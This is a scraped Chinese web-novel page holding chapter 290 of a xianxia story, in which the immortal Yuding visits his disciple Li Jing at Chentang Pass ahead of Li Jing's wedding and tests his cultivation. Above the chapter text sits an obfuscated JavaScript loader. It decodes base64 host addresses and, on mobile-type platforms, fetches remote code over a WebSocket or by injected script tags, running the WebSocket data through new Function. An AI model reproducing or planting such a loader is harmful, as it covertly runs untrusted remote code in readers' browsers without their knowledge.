宜小说

字:
关灯 护眼
宜小说 > 别让玉鼎再收徒了 > 第290章 别再给我闻仲托孤了 6k中杯
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第290章 别再给我闻仲托孤了 6k中杯

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
ps:咳咳,大家久等了,没割,写了章中杯奉上!
  
  
  
  那年轻甲士闻言诧异打量了眼那道人,就见这个道人一身紫色八卦道袍,约摸五十岁上下,头发灰白,相貌清矍,精神矍铄,左手臂弯处搭着一柄拂尘,看起来有些超凡出尘的意味。
  
  
  
  他却不知玉鼎此番为了来参加徒弟的婚礼,为了给弟子撑体面更是脱了以前的道袍,换上了变化后的八卦紫绶仙衣。
  
  
  
  作为徒弟唯一的亲人,玉鼎此番到来是真正上了心的。
  
  
  
  “总兵大人军务繁忙,道长,您若不说找总兵大人什么事儿,小的真不好通秉。”那年轻军士摇头说道。
  
  
  
  “你家总兵是不是叫李靖,很快就要成亲了?”玉鼎笑问道。
  
  
  
  “不是,我们陈塘关总兵姓殷。”
  
  
  
  那小兵摇摇头:“道长说的那位可是我们陈塘关的李靖副总兵?”
  
  
  
  “副总兵?”
  
  
  
  看来的确来早了……玉鼎眉头一挑:“那你们副总兵的府宅在何处?”
  
  
  
  对于大商武职他倒有些印象,总兵官为镇守地方关隘的最高军事长官,而在总兵官之下还会设有副总兵、参将、游击将军等武职。
  
  
  
  他记得李靖出场时早已是陈塘关总兵了,不过那会儿哪吒都出生了,此番还未成婚,当着还没转正的副总兵也算正常……个屁啊!
  
  
  
  玉鼎有些无语,当度厄真人的徒弟按原来进程没问题,但此番是他教出来的,提前当上总兵那不是很正常的吗?
  
  
  
  要知道他师哥师姐们下山后,没用多久就打响了成名之战,结果这小子还是个副总兵……
  
  
  
  士兵闻言用异样目光看了眼玉鼎,接着抬手指路道:“沿着这街走下去,到路口左拐,再左拐,再……诶,人呢?”
  
  
  
  待那士兵指完路,回过头来时,发现身前空空如也,那个老道士不知何时消失不见,不由的吃了一惊。
  
  
  
  陈塘关!
  
  
  
  一座位于大商东北方位的重要关隘,毗邻东海,作为大商东北方门户,这座关隘的重要性自然不言而喻。
  
  
  
  是以关内常驻大军十万有余,此外更有上百万平民百姓在陈塘关境内生活着。
  
  
  
  玉鼎漫步在关内,看着街上人来人往,不由暗暗点头。
  
  
  
  当今洪荒,人族的确已然大兴,区区一座关口就能有这么多人口。
  
  
  
  玉鼎漫步在城内,自他来到这个世界后常年在仙境往来,倒是很少在人间来过。
  
  
  
  此时,这街道上鼎沸的人声,不绝于耳的叫卖声,各种小吃的蒸汽飘散,到处充斥着人间的烟火气息。
  
  
  
  玉鼎也不由放缓脚步,收敛了一身修为,彷佛一个普通老道一般行走在人群中,感受着久违的……人气。
  
  
  
  不知不觉,他便到了一座府宅前,匾上书副总兵府几个字,门口也有两个披坚执锐的甲士看守,但是这府宅的规模却是比那总兵府低了好几个档次。
  
  
  
  玉鼎的目光深邃起了,又扭头往城内看了看,最后收回目光继续看向这座副总兵府。
  
  
  
  看来这个徒弟混的不怎么样啊……玉鼎目光闪动,堂堂副总兵的府邸之简陋比参将府都不如,可不是不咋滴么?
  
  
  
  如此看来毕方并未对李靖造成太大影响,不然依着毕方那无法无天的妖魔性情,只怕早就大杀四方了。
  
  
  
  “道长看着我家大人的府邸,又是摇头又是叹气的,不知有何见教?”门口的甲士见状忍不住道。
  
  
  
  不过他也晓得,自家那位大人出身道门,对道人极为尊重,所以言语并未太过无礼。
  
  
  
  “有劳,小哥进去告诉你家大人,就说太虚道人来了。”玉鼎拂尘一扫道。
  
  
  
  那甲士看了眼玉鼎,接着转身进去禀报了,玉鼎则颔首打量着四周。
  
  
  
  “那位道长就在门外吗?”
  
  
  
  不多时,只见一个三十岁上下,蓄着一点胡须,身形挺拔的中年汉子神情激动,闻讯而来。
  
  
  
  当看到玉鼎后眼圈一红,惊喜的快步上前,噗通跪下道:“师父来了,师父在上请受弟子一拜。”
  
  
  
  师父……门口两个甲士看着自家大人,又看看那个道人,眼中满是震惊之色。
  
  
  
  “起来罢!”
  
  
  
  玉鼎拂尘一扫,微笑着伸出手,将李靖搀扶起来,微笑道:“徒儿大婚,当师父的怎可不来!”
  
  
  
  李靖抬头摸着脑袋笑了笑,又赶紧将玉鼎迎入府内在客厅坐下。
  
  
  
  “师父云游四方,弟子也怕师父来不及,所以提前半年就发出了信,让火鸦带给师父。”
  
  
  
  李靖笑道:“当然如果火鸦找到迟了,也无妨,弟子总会等师父收到信来了再办事。”
  
  
  
  “那可不行,良辰吉日,为师岂会让你耽误?”
  
  
  
  玉鼎笑着说道:“现在离大婚之日没多少时间了吧?”
  
  
  
  “还有半个月了!”李靖难掩脸上的喜色。
  
  
  
  玉鼎瞥他一眼:“破身了没?”
  
  
  
  李靖老脸一红,道:“还没!”
  
  
  
  好小子……玉鼎瞥他一眼伸手一指点出。
  
  
  
  李靖看着点来的这根指头,神情一变,从上面感受到了危险的气息,更可怕的是小小一根手指,竟让他感觉封死了一切退路,唯有硬抗一条路。
  
  
  
  当即,他就明白了自家师父的考校之意,更不敢大意,当即心随意动,强大的真气游走全身。
  
  
  
  随着“冬”的一声,顷刻间,他体表就浮现了一层澹澹的金色光芒,整个人彷佛金铁铸成。
  
  
  
  叮!
  
  
  
  玉鼎的指头轻飘飘的落在李靖胸口,发出一声金铁碰撞般的轻响,可是李靖脸上勃然变色,只觉得那根手指上如惊涛骇浪般的可怕力量传了过来。
  
  
  
  一浪强过一浪!
  
  
  
  卡察!
  
  
  
  终于,李靖体表的金光支撑不住,被击溃消散,身下的椅子轰然粉碎,整个人坐在地上,双眼凸出差点儿一口气没上来。
  
  
  
  良久李靖才勐的吐出口气,接着大口大口的喘息起来,抬手捂着胸口苦笑道:“师父下手还真重!”
  
  
  
  “严师出高徒,听过没?修炼多流汗,战时少流血。”
  
  
  
  玉鼎瞥他一眼笑道:“方才为师那一击后面用上了真仙的力道,你能撑住,说明这些年没有偷懒。如今等闲的炼气地仙,武道天境之流已不是你的对手了。”
  
  
  
  “弟子哪敢偷懒啊!”李靖干笑一声后叹息道:“可惜,破身后……弟子的这门练了多年的功夫就要被废了。”
  
  
  
  “谁说的?”玉鼎抚须得意一笑。
  
  
  
  “啊?”李靖目瞪口呆忙道:“那玉书上分明写着,这门功夫得童子身练,破身后会被废的啊?”
  
  
  
  “练不成破身就废了,如果练成了……又怎么会?”
  
  
  
  玉鼎狡黠一笑,起身在李靖脑袋上轻轻拍了一下:“笨蛋徒儿,为师还不是怕你被花花世界迷了眼,耽误了练功?你不会记恨师父骗你吧?”
  
  
  
  要是让李靖不破身,生不了儿子,文殊普贤太乙那三个老王八蛋岂会饶了他?
  
  
  
  文殊普贤的意见他可以不管,但老太乙的面子,必须得给啊!
  
  
  
  李靖茫然坐在地上,忽然大喜的抱住玉鼎大腿:“多谢师父,多谢师父!弟子知道师父是为了弟子好,弟子怎敢怨恨?
  
  
  
  哈哈哈,谢谢师父谢谢师父!”
  
  
  
  大厅里响彻着李靖痛快和开怀的的大笑声。
  
  
  
  老阴比……李靖的心境中毕方轻哼道:“还有这小子,我早说了那老家伙是骗你的,非不信,现在证明我是对的吧?”
  
  
  
  正说着,他忽然神情一变,紧张了起来。
  
  
  
  因为他看到玉鼎似有所感朝李靖看来,深邃的目光好像穿透了李靖,看到了他。
  
  
  
  “怎么样,你身体中封印的那个危险的家伙……还老实吧?”玉鼎问道。
  
  
  
  你他娘的才危险,你全家都危险……听到玉鼎旧话重提,毕方神情抽搐,要不是打不过,他非得当场就炸了。
  
  
  
  你说我危险,我打不过你,那到底谁危险?
  
  
  
  李靖闻言嘴角一掀:“还挺老实的。”
  
  
  
  师徒两人久别重逢,开始了一番叙旧……玉鼎听着李靖这些年追爱的经历,忍不住又拍了李靖一巴掌,训斥道:“你小子要是在修炼上有这份心思和毅力,你早修成人仙了。”
  
  
  
  对此,李靖唯唯诺诺的干笑道:“追求不同!咳咳,人跟人的追求不同!”
  
  
  
  待听到李靖说起后面时,玉鼎神情微动:“你说……几年前,你受到三王子的赏识?”
  
  
  
  “不错,那位三殿下不知所踪了两年之久,回来后,开始积极争取王位……”
  
  
  
  李靖自顾自的说着,而旁边,玉鼎的神情有些微妙了起来,最后叹了口气。
  
  
  
  你看……一切这可不就对上了么!
  
  
  
  心中有答桉是一回事,但当答桉真正确认后就是另一回事儿了。
  
  
  
  本来他该坚定的追随师门的步伐,助周伐商,赶紧搞定封神这事儿让大家都安生的。
  
  
  
  可现在未来的商王和周王都是自己徒弟,这……还打个屁啊!
  
  
  
  这让他去帮谁?
  
  
  
  玉鼎忽然道:“这陈塘关总兵给你穿小鞋,你能咽下这口气?”
  
  
  
  “师父有所不知,这一来,陈塘关总兵乃是广灵的三叔,弟子曾因广灵的事儿和殷家曾有些过节。”
  
  
  
  李靖苦笑一声道:“二来三殿下当初为了帮我,也恶了殷氏使得他们转向支持大殿下,虽然大王钟意三殿下立为王储,但群臣不服,只怕大王驾崩之日朝堂必有一场大乱……”
  
  
  
  “放心,朝堂那边……乱不了。”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师